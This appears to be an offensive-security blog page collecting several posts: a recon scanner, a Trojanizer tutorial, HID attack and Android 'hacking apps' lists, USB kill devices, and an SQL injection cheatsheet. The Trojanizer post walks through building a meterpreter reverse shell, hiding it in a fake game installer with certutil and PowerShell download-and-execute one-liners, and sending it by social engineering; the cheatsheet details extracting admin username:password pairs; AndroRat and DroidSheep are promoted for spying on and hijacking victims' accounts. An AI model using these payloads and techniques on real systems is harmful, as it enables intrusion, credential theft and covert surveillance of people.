Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Offensive Sec. Show all posts
Showing posts with label Offensive Sec. Show all posts

Thursday, October 18, 2018

Raccoon - A High Performance Offensive Security Tool For Reconnaissance And Vulnerability Scanning



Offensive Security Tool for Reconnaissance and Information Gathering.

Features
  • DNS details
  • DNS visual mapping using DNS dumpster
  • WHOIS information
  • TLS Data - supported ciphers, TLS versions, certificate details, and SANs
  • Port Scan
  • Services and scripts scan
  • URL fuzzing and dir/file detection
  • Subdomain enumeration - uses Google Dorking, DNS dumpster queries, SAN discovery, and brute-force
  • Web application data retrieval:
    • CMS detection
    • Web server info and X-Powered-By
    • robots.txt and sitemap extraction
    • Cookie inspection
    • Extracts all fuzzable URLs
    • Discovers HTML forms
    • Retrieves all Email addresses
  • Detects known WAFs
  • Supports anonymous routing through Tor/Proxies
  • Uses asyncio for improved performance
  • Saves output to files - separates targets by folders and modules by files

Roadmap and TODOs
  • Support multiple hosts (read from the file)
  • Rate limit evasion
  • OWASP vulnerabilities scan (RFI, RCE, XSS, SQLi etc.)
  • SearchSploit lookup on results
  • IP ranges support
  • CIDR notation support
  • More output formats

About
A raccoon is a tool made for reconnaissance and information gathering with an emphasis on simplicity.
It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data, detecting WAF presence and up to threaded dir busting and subdomain enumeration. Every scan outputs to a corresponding file.
As most of Raccoon's scans are independent and do not rely on each other's results, it utilizes Python's asyncio to run most scans asynchronously.
Raccoon supports Tor/proxy for anonymous routing. It uses default wordlists (for URL fuzzing and subdomain discovery) from the amazing SecLists repository but different lists can be passed as arguments.
For more options - see "Usage".

Installation
For the latest stable version:
pip install raccoon-scanner
Or clone the GitHub repository for the latest features and changes:
git clone https://github.com/evyatarmeged/Raccoon.git
cd Raccoon
python raccoon_src/main.py

Prerequisites
Raccoon uses Nmap to scan ports as well as utilizes some other Nmap scripts and features. It is mandatory that you have it installed before running Raccoon.
OpenSSL is also used for TLS/SSL scans and should be installed as well.

Usage
Usage: raccoon [OPTIONS]

Options:
  --version                      Show the version and exit.
  -t, --target TEXT              Target to scan  [required]
  -d, --dns-records TEXT         Comma separated DNS records to query.
                                 Defaults to: A,MX,NS,CNAME,SOA,TXT
  --tor-routing                  Route HTTP traffic through Tor (uses port
                                 9050). Slows total runtime significantly
  --proxy-list TEXT              Path to proxy list file that would be used
                                 for routing HTTP traffic. A proxy from the
                                 list will be chosen at random for each
                                 request. Slows total runtime
  --proxy TEXT                   Proxy address to route HTTP traffic through.
                                 Slows total runtime
  -w, --wordlist TEXT            Path to wordlist that would be used for URL
                                 fuzzing
  -T, --threads INTEGER          Number of threads to use for URL
                                 Fuzzing/Subdomain enumeration. Default: 25
  --ignored-response-codes TEXT  Comma separated list of HTTP status code to
                                 ignore for fuzzing. Defaults to:
                                 302,400,401,402,403,404,503,504
  --subdomain-list TEXT          Path to subdomain list file that would be
                                 used for enumeration
  -S, --scripts                  Run Nmap scan with -sC flag
  -s, --services                 Run Nmap scan with -sV flag
  -f, --full-scan                Run Nmap scan with both -sV and -sC
  -p, --port TEXT                Use this port range for Nmap scan instead of
                                 the default
  --tls-port INTEGER             Use this port for TLS queries. Default: 443
  --skip-health-check            Do not test for target host availability
  -fr, --follow-redirects        Follow redirects when fuzzing. Default: True
  --no-url-fuzzing               Do not fuzz URLs
  --no-sub-enum                  Do not bruteforce subdomains
  -q, --quiet                    Do not output to stdout
  -o, --outdir TEXT              Directory destination for scan output
  --help                         Show this message and exit.

Screenshots

HTB challenge example scan:




Results folder tree after a scan:



Share:

Tuesday, January 23, 2018

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer


The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)

-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed 


-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat 


single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2º file inputed will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)

The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD/INSTALL
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)



xsf.conf - single_file_execution + Presetup (advanced options)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)


Final sfx archive with icon changed


Inside the sfx archive (open with winrar) - trojan behavior


Inside the sfx archive (open with winrar) - single_file_execution



Video tutorials

Trojanizer - single_file_execution (not trojan behavior)


Trojanizer - AVG anti-virus fake installer (trojan behavior)




Share:

Sunday, January 8, 2017

Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID - Brutal



Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target’s machine and completely compromise it, regardless of autorun. I’ve used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all password . Now im develop new tools the name is Brutal


So what Brutal ?
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device

Screenshoot



Video
  • Do you want like a mr robot hacking scene when Angela moss plug usb into computer for get credential information ? you can choose payload in brutal ( optional 3 or 4 )

The Goal
  • Generate various payload and powershell attack without coding
  • To help breaking computer very fast and agile :p
  • The Payloads Compatibility > target Windows machines only

Requirements
  • Arduino Software ( I used v1.6.7 )
  • TeensyDuino
  • Linux udev rules
  • How install all requirements ? Visit This Wiki

Supported Hardware
The following hardware has been tested and is known to work.
  • Teensy 3.x
  • Usb Cable 

Getting Started
  1. Copy and paste the PaensyLib folder inside your Arduino\libraries
  2. git clone https://github.com/Screetsec/Brutal.git
  3. cd Brutal
  4. chmod +x Brutal.sh
  5. sudo ./Brutal.sh or sudo su ./Brutal.sh

Credits


Share:

Monday, October 10, 2016

Top 10 Best Apps 2016 - Android Hacking



Do you wanna know how to turn your smartphone in hacking machine ? then you came at  right place . let’s talk about Top 10 Best Android Hacking Apps.

Obs, I'm not responsible for your act

Top 10 Best Android Hacking Apps

#1 Androrat

#AndroRat  ‘s meaning is  Android Remote Administration Tool. androrat is a remote administration tool which is used to control another device without physical access to victim’s device!

see features of Androrat

ºGet contacts (and all theirs informations)
ºGet call logs & Get all messages
ºLocation by GPS/Network
ºMonitoring received messages in live
ºMonitoring phone state in live (call received, call sent, call missed..)
ºTake a picture from the camera & Stream sound from microphone (or other sources..)
ºStreaming video (for activity based client only)
ºDo a toast & Send a text message
ºGive call & Open an URL in the default browser


Download Androrat



#2 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications. The following information is described in the results, generated when analysis is complete:

features of Droidbox

ºHashes for the analyzed package
ºIncoming/outgoing network data
ºFile read and write operations
ºStarted services and loaded classes through DexClassLoader
ºInformation leaks via the network, file and SMS
ºCircumvented permissions
ºCryptographic operations performed using Android API
ºListing broadcast receivers
ºSent SMS and phone calls


Download DroidBox



#4 zANTI


zANTI is a penetration testing toolkit  developed by Zimperium Mobile Security for cyber security professionals. Basically, it allows you to simulate malicious attacks on a network. With the help of zANTI, you will be able to perform various types of operations such as MITM attacks, MAC address spoofing, scanning, password auditing, vulnerability checks and much more. In short, this android toolkit is a perfect companion of hackers.  How to use zANTI for Hacking .  this app is very professional in android hacking apps.




features of zANTI

ºuser can Change device’s MAC address.
ºthey can Create a malicious WiFi hotspot.
ºHijack HTTP sessions.
ºCapture downloads.
ºModify HTTP requests and responses.
ºExploit routers.
ºAudit passwords.
ºCheck a device for shellshock and SSL poodle vulnerability.


Download zANTI


#5 APK Inspector




APKinspector is a powerful GUI tool to analyse the Android apps , goal for this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code , edit remove credits license etc.


Download APK Inspector


#6 Droid Sheep

DroidSheep can use victims’ accounts, gaining access to sites that don’t use a secured and encrypted SSL connection that may make HTTPS vulnerable . DroidSheep requires root privileges. While popular sites like Yahoo, Google, and Facebook now support encrypted HTTPS connections that aren’t vulnerable to a tool like DroidSheep, there surely are hundreds of others that are.





Droidsheep apk is also a tool to hack Facebook, Twitter and many other site via your android device. Droidsheep uses the method of cookie Hijacking to hack these accounts. Droidsheep don’t reveal you the passwords and email but you can access Facebook accounts directly without them, i.e. this app provides a ink to get access to other accounts directly.this tool is beast one in the list of android hacking apps.


Download Droid Sheep



#7 Arpspoof





Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. Arpspoof  redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths ,arpsoof in list of my favorite android hacking apps.


Download Arpspoof



#8 Nmap for Android




Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good so that was one of in android hacking apps.


Download NmapA



#9 dSploit 





dSploit is a penetration testing suite developed by Simone Margaritelli for the Android operating system. which consists of several modules that are capable to perform network security assessments on wireless networks,must read guide on


Download dSploit


#10 Wifikill

Wifi Kill Pro Hacking Tool





WiFiKill  is an android tool that you can use to disable internet connection for a device on constant WiFi network. It is a light-weight tool with simple interface , you can kick any user in same wifi network which means you can prevent your neighbors to using your wifi connection using wifikill


Download Wifi Kill Pro


By OffSec
Share:

Wednesday, September 28, 2016

USB Kill to Destroy any Computer within Seconds! - USB Kill 2.0



A proof-of-concept USB prototype that was designed by a Russian researcher, Dark Purple, last year, to effectively destroy sensitive components of a computer when plugged in.

Now, someone has actually created the Killer USB stick that destroys almost anything – such as Laptops, PCs, or televisions – it is plugged into.

A Hong Kong-based technology manufacturer is selling a USB thumb drive called USB Kill 2.0 that can fry any unauthorized computer it's plugged into by introducing a power surge via the USB port. It costs $49.95.

How does USB Kill 2.0 work?


As the company explains, when plugged in, the USB Kill 2.0 stick rapidly charges its capacitors via the USB power supply, and then discharges – all in a matter of seconds.

The USB stick discharges 200 volts DC power over the data lines of the host machine and this charge-and-discharge cycle is repeated several numbers of times in just one second, until the USB Kill stick is removed.
"When tested on computers, the device isn't designed or intended to erase data," the company says. "However, depending on the hardware configuration (SSD [solid-state drive] vs. platter HDD [hard disk drive]), the drive controllers may be damaged to the point that data retrieval is impractical."
"Any public facing USB port should be considered an attack vector," the company says in a news release. "In data security, these ports are often locked down to prevent exfiltration of data or infiltration of malware, but are very often unprotected against electrical attack."

When And For Whom USB KILL Would Be Useful?


USB Kill stick could be a boon for whistleblowers, journalists, activists, and, not to forget, cyber criminals, who want to keep their sensitive data away from law enforcement as well as cyber thieves.

It is like, if you're caught, kill yourself. In the same fashion as terrorists do. Here I mean to kill the data from your laptop if the law enforcement has caught your laptop. And USB Kill stick does the same for you.

However, the company claims to have developed USB Kill 2.0 stick for the sole purpose of allowing companies to test their devices against USB Power Surge attacks and to prevent data theft via "Juice Jacking" attacks.

Video Demonstration


You can watch the video demonstration below by the company that shows USB Kill 2.0 stick in action.


The company claims about 95% of all devices available on the market today are vulnerable to power surge attacks introduced via the USB port.

However, the only devices not vulnerable to USB kill attacks are recent models of Apple's MacBook, which optically isolate the data lines on USB ports.

Juice jacking is a type of cyber attack wherein malware installed on a computer can surreptitiously copy data from a smartphone, tablet or other computers using a USB charging port that doubles as a data connection, typically over USB.

While USB Kill 2.0 has been "designed and tested to be safe," the company warns that the USB stick "is a high-voltage device" and is only meant for "responsible adults." Also, the company's website "strongly condemns the malicious use of its products."

USB Kill 2.0 also comes with a USB Protection Shield, called Test Shield, sold for additional $15.70, which is designed to allow testing of the USB Killer stick without destroying the host machine.

Source: UsbKill

By OffSec
Share:

Saturday, September 10, 2016

The Best Penetration Testing Distribution - Kali Linux 2016.2



This release brings a whole bunch of interesting news and updates into the world of Kali.

New KDE, MATE, LXDE, e17, and Xfce Builds

Although users are able to build and customize their Kali Linux ISOs however they wish, we often hear people comment about how they would love to see Kali with $desktop_environment instead of GNOME. We then engage with those people passionately, about how they can use live-build to customize not only their desktop environment but pretty much every aspect of their ISO, together with the ability to run scripted hooks at every stage of the ISO creation process – but more often than not, our argument is quickly lost in random conversation. As such, we’ve decided to expand our “full” 64bit releases with additional Desktop Environment flavored ISOs, specifically KDE, Mate, LXDE and Enlightenment. These can now be downloaded via our Kali Download page. For those curious to see what the various Desktop Environments look like, we’ve taken some screenshots for you:

Gnome

E17

KDE

LXDE

Mate

Xfce

Kali Linux Weekly ISOs

Constantly keeping Kali on the bleeding edge means frequent updates to packages on an ongoing basis. Since our last release several months ago, there’s a few hundred new or updated packages which have been pushed to the Kali repos. This means that anyone downloading an ISO even 3 months old has somewhat of a long “apt-get dist-upgrade” ahead of them. To help avoid this situation, from this release onwards, we’ll be publishing updated weekly builds of Kali that will be available to download via our mirrors. Speaking of mirrors, we are always in need of support in this area – if you’re capable of running a high-bandwidth mirror and would like to support our project, please check out our Kali Mirrors page.

Bug Fixes and OS Improvements

During these past few months, we’ve been busy adding new relevant tools to Kali as well as fixing various bugs and implementing OS enhancements. For example, something as simple as adding HTTPS support in busybox now allows us to preseed Kali installations securely over SSL. This is a quick and cool feature to speed up your installations and make them (almost) unattended, even if you don’t have a custom built ISO.


To set a preseed file during an install process, choose the “install” option, then hit “tab” and enter the preseed directive, together with a URL pointing to your actual preseed file.
preseed/url=https://www.kali.org/dojo/preseed.cfg

Read more here.


Share:

Sunday, September 4, 2016

Anti-forensic Kill-switch - usbkill




usbkill  is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

To run:


sudo python usbkill.py
or


sudo python3 usbkill.py
Related project; same idea, but implemented as a Linux driver: https://github.com/NateBrune/silk-guardian

Why?

Some reasons to use this tool:

º In case the police or other thugs come busting in (or steal your laptop from you when you are at a public library, as happened to Ross). The police commonly uses a  mouse jiggler  to keep the screensaver and sleep mode from activating.
º You don’t want someone to add or copy documents to or from your computer via USB.
º You want to improve the security of your (encrypted) home or corporate server (e.g. Your Raspberry).

[!] Important: Make sure to use disk encryption for all folders that contain information you want to be private. Otherwise they will get it anyway. Full disk encryption is the easiest and surest option if available

Tip: Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start usbkill. If they steal your computer, the USB will be removed and the computer shuts down immediately.


Feature List

(version 1.0-rc.4)

º Compatible with Linux, *BSD and OS X.
º Shutdown the computer when there is USB activity.
º Customizable. Define which commands should be executed just before shut down.
º Ability to whitelist a USB device.
º Ability to change the check interval (default: 250ms).
º Ability to melt the program on shut down.
º RAM and swap wiping.
º Works with sleep mode (OS X).
º No dependency except secure-delete iff you want usbkill to delete files/folders for you or if you want to wipe RAM or swap. sudo apt-get install secure-delete
º Sensible defaults

Supported command line arguments (partially for devs):

º -h or --help: show help message, exit.
º --version: show version of the program, exit.
º --no-shut-down: if a malicious change on the USB ports is detected, execute all the (destructive) commands you defined in settings.ini, but don’t turn off the computer.
º --cs: Copy program folder settings.ini to /etc/usbkill/settings.ini

Contact

hephaestos@riseup.net - PGP/GPG Fingerprint: 8764 EF6F D5C1 7838 8D10 E061 CF84 9CE5 42D0 B12B




Share:

Sunday, August 28, 2016

Full SQL Injections - Cheatsheet



[1]* -Introducing The SQL Injection Vuln:

SQL injection attacks are known also as SQL insertion
it's in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect...)

[2]* -Exploiting Sql Injection Vuln :

Before proceeding to the exploitation of sql injections we have to checking for this vulnerability, so we have an exemple


http://www.website.com/articles.php?id=3

for checking the vulnerability we have to add ' (quote) to the url , lets see together


http://www.website.com/articles.php?id=3'

now, if we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

this website is vulnerable to sql injection, and if we don't get anything we can't exploiting this vulnerability.

Now, Lets go to exploiting this vuln and finding some informations about this sql database


certainly before doing anything we have to find the number of columns

[-] Finding the number of columns:

for finding the number of columns we use ORDER BY to order result in the database

lets see that ,


http://www.website.com/articles.php?id=3 order by 1/*

and if we havn't any error we try to change the number


http://www.website.com/articles.php?id=3 order by 2/*

still no error,so we continu to change the number


http://www.website.com/articles.php?id=3 order by 3/*

no error to


http://www.website.com/articles.php?id=3 order by 4/*

no error


http://www.website.com/articles.php?id=3 order by 5/*

yeah , here we have this error (Unknown column '5' in 'order clause')

so, this database has 4 colmuns because the error is in the 5

now, we try to check that UNION function work or not

[-] Checking UNION function :

for using UNION function we select more informations from the database in one statment

so we try this


http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)

now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work

if it not work we try to change the /* to --

so we have this


http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

after checking the UNION function and it works good we try to get SQL version

[-] Getting SQL Version :

now we have a number in the screen after checking the UNION

we say in example that this number is 3

so we replace 3 with @@version or version()


http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version in the screen!

lets go now to get tables and columns names


[-] Getting tables and columns names :

here we have a job to do!!

if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)

lets see that the table admin exist!


http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*

and here we see the number 3 that we had in the screen

now, we knows that the table admin exists

here we had to check column names:


http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

if we get an error we have to try another column name

and if it work we get username displayed on screen (example: admin,moderator,super moderator...)

after that we can check if column password exists

we have this


http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

and oups! we see password on the screen in a hash or a text

now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...


http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*


this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)


[3]* -Exploiting Blind SQL Injection Vuln :

first we should check if website is vulnerable for example


http://www.website.com/articles.php?id=3

and to test the vulnerability we had to use


http://www.website.com/articles.php?id=3 and 1=1 ( we havn't any error and the page loads normally)

and now


http://www.website.com/articles.php?id=3 and 1=2

here we have some problems with text, picture and some centents ! and it's good! this website is vulnerable for Blind SQL Injection

we have to check MySQL Version

[-] Getting MySQL Version :

we use substring in blind injection to get MySQL Version


http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4

we should replace the 4 with 5 if the version is 5


http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5


and now if the function select do not work we should use subselect and we should testing if it work

[-] Testing if subselect works :


http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page load normaly the subselect works good)

and now we have to see if we have access to mysql.user


http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it load normaly we have access to mysql.user)

now, we can checking table and column names

[-] Checking table and column names :


http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1

if the page load normaly and no errors the table users exists

now we need column name


http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page load normaly and no errors the column password exists

now we have the table and the column , yeah, we can exploiting the vunlnerability now


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

the page load normaly and no errors,so we need to change the 80 for having an error


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90

no errors ! we continu


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

Yeah!! an error

the character is char(99). we use the ascii converter and we know that char(99) is letter 'c'

to test the second character we change ,1,1 to ,2,1


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

the page load normaly


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

the page loads normally, higher !!!


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

error ! lower number


http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

Error That we search!!

now, we know that the second character is char(105) and that is 'i' with the ascii converter. We have 'ci' now from the first and the second charactets

our tutorial draws to the close!

Thanks you for reading and i hope that you have understand SQL Injection and exploitations of this vulnerability .

Source: www.exploit-db.com

By OffensiveSec
Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition